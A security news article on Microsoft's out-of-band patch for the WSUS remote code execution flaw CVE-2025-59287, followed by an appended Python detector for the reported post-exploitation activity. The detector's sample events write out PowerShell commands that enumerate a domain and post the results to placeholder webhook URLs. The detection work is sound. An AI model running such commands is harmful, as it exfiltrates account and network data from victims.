Microsoft releases emergency patch for Windows Server Update Services (WSUS)

Microsoft has released out-of-band patches for a critical vulnerability in Windows Server Update Services (WSUS), for which a public proof-of-concept exploit is already available. The issue is tracked as CVE-2025-59287 and allows remote code execution on vulnerable servers.

WSUS allows administrators to manage and distribute Windows updates to computers within a corporate network. Microsoft emphasizes that the bug affects only Windows servers with the WSUS Server Role enabled (this feature is disabled by default).

The vulnerability can be exploited remotely, and such attacks require no user interaction. A remote, unauthenticated attacker can send a specially crafted event that triggers unsafe object deserialization in a legacy serialization mechanism, leading to remote code execution. As a result, an unprivileged attacker can execute malicious code with SYSTEM privileges.

This makes the bug potentially self-propagating between WSUS servers — that is, it can act like a worm.

“Windows servers without the WSUS Server Role enabled are not vulnerable. If the WSUS role is already enabled, the server is vulnerable. If you plan to enable the WSUS role, install the patch first; otherwise, the server will become vulnerable immediately after the role is activated,” Microsoft reports.

Microsoft has prepared updates for all affected versions of Windows Server and urged users to install them as soon as possible. Patches are available for:

Additionally, the developers have proposed a number of temporary measures for administrators who cannot immediately install the emergency updates. You can disable the WSUS Server Role or block all incoming traffic on ports 8530 and 8531, which will render WSUS inoperable. However, keep in mind that after disabling WSUS or blocking the traffic, Windows endpoints will stop receiving updates from the local server.

In a separate bulletin, Microsoft reported that WSUS will no longer display synchronization error details after installing these or later patches — the functionality has been temporarily disabled to address the CVE-2025-59287 vulnerability.

According to specialists at Eye Security, the first attempts to scan for and exploit the new vulnerability have already been detected. The systems of at least one of the company’s clients were compromised using an exploit different from the one that surfaced online earlier.

Although WSUS servers are usually not accessible over the internet, Eye Security discovered about 2,500 accessible instances worldwide.

The US company Huntress also warns that it has already found evidence of attacks on CVE-2025-59287, targeting WSUS instances with default ports (8530/TCP and 8531/TCP) exposed.

“We expect exploitation of CVE-2025-59287 to be limited — WSUS rarely has ports 8530 and 8531 open. Across our partner base, we identified about 25 vulnerable hosts,” Huntress noted.

In the attacks observed by Huntress, the attackers executed a PowerShell command to enumerate the internal Windows domain, after which the data was sent to a webhook. This data included the output of whoami (the current user name), net user /domain (a list of all accounts in the Windows domain), and ipconfig /all (the network configuration for all network interfaces).
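As an added example (not code from the article, Huntress or Microsoft), the following Python detector applies the reported pattern to process-creation telemetry: it flags a PowerShell command line that chains the enumeration commands named above with an outbound web request. The events, hostnames and webhook URLs are constructed placeholders.

```python
import re

# Enumeration commands reported by Huntress in the observed post-exploitation
# activity; matched case-insensitively in the command line.
RECON_PATTERNS = {
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "net user /domain": re.compile(r"\bnet\s+user\s+/domain\b", re.I),
    "ipconfig /all": re.compile(r"\bipconfig\s+/all\b", re.I),
}
# Signs that the collected output is being posted to a web endpoint (webhook).
EXFIL_PATTERN = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient|\bcurl\b|https?://",
    re.I,
)

# Constructed sample process-creation events (host, image, command line); the
# hostnames and URLs are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    ("wsus01", "powershell.exe",
     'powershell -c "whoami; net user /domain; ipconfig /all | '
     'Invoke-WebRequest -Uri https://webhook.example.invalid/x -Method POST"'),
    ("dc01", "powershell.exe", 'powershell -c "net user /domain"'),
    ("ws07", "cmd.exe", "cmd /c ipconfig /all"),
    ("wsus02", "cmd.exe",
     'cmd /c powershell -nop -w hidden -c "$o = whoami; $o += ipconfig /all; '
     'irm -Uri https://hooks.example.invalid/z -Method Post -Body $o"'),
    ("wsus02", "powershell.exe",
     'powershell -c "Invoke-WebRequest https://intranet.example.invalid/health"'),
]

def score_command(cmdline):
    """Return (list of recon commands found, whether a web call is present)."""
    matched = [name for name, pat in RECON_PATTERNS.items() if pat.search(cmdline)]
    return matched, bool(EXFIL_PATTERN.search(cmdline))

def detect(events, min_recon=2):
    """Flag PowerShell command lines that chain >= min_recon enumeration commands
    with an outbound web request, the combination described in the article."""
    alerts = []
    for host, image, cmdline in events:
        if "powershell" not in (image + " " + cmdline).lower():
            continue  # the reported activity was a PowerShell command
        matched, exfil = score_command(cmdline)
        if len(matched) >= min_recon and exfil:
            alerts.append({"host": host, "recon": matched, "cmdline": cmdline})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['host']}: {', '.join(alert['recon'])} + web request")
```

A single enumeration command or a lone web request is not flagged on its own, which keeps routine admin activity out of the alert list; tune `min_recon` to the noise level of your environment.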